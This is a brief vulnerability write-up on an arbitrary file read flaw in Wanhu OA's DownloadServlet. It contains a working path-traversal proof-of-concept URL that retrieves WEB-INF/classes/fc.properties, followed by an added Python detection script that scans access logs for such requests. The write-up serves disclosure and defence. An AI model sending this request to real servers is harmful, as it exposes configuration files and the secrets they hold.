Wanhu OA DownloadServlet Arbitrary File Read Vulnerability
Vulnerability Description
The DownloadServlet interface of Wanhu OA has an arbitrary file read vulnerability. An attacker can use it to read sensitive files on the server and obtain sensitive information.
Vulnerability Impact
Wanhu OA
Network surveying and mapping
Vulnerability Reproduction
Product Page
Verification PoC
/defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2
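A detection sketch for the request shape shown above, added here as an example and not part of the original post: it scans web access logs for DownloadServlet requests whose `path` or `FileName` parameter contains a parent-directory segment or points into `WEB-INF`/`META-INF`. The combined log format, the sample log lines, and the function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
FILE_PARAMS = {"path", "filename"}   # parameters that select the file to serve
PROTECTED = {"web-inf", "meta-inf"}  # webapp directories never meant for download

def fully_decode(value, rounds=3):
    """Undo nested URL encoding and normalise separators and case."""
    for _ in range(rounds):
        value = unquote(value)
    return value.replace("\\", "/").lower()

def suspicious_download(uri):
    """Return the reasons a DownloadServlet request looks like a file-read attempt."""
    parts = urlsplit(uri)
    if not fully_decode(parts.path).endswith("/downloadservlet"):
        return []
    reasons = []
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() not in FILE_PARAMS:
            continue
        segments = fully_decode(raw).split("/")
        if ".." in segments:
            reasons.append(f"{name}: parent-directory segment")
        if PROTECTED.intersection(segments):
            reasons.append(f"{name}: protected directory")
    return reasons

def scan(lines):
    """Yield (line_number, reasons) for every flagged log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        reasons = suspicious_download(match.group(1)) if match else []
        if reasons:
            yield number, reasons

# Constructed sample log lines (documentation IP addresses, invented file names).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /defaultroot/DownloadServlet?modeType=0&key=x&path=upload&FileName=report.doc&name=report.doc HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2 HTTP/1.1" 200 734',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /defaultroot/DownloadServlet?modeType=0&key=x&path=%252e%252e&FileName=x.txt&name=x HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {'; '.join(reasons)}")
```

A 200 response on a flagged line is the case to triage first, since it indicates the server returned file content.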
This post is licensed under CC BY 4.0 by the author.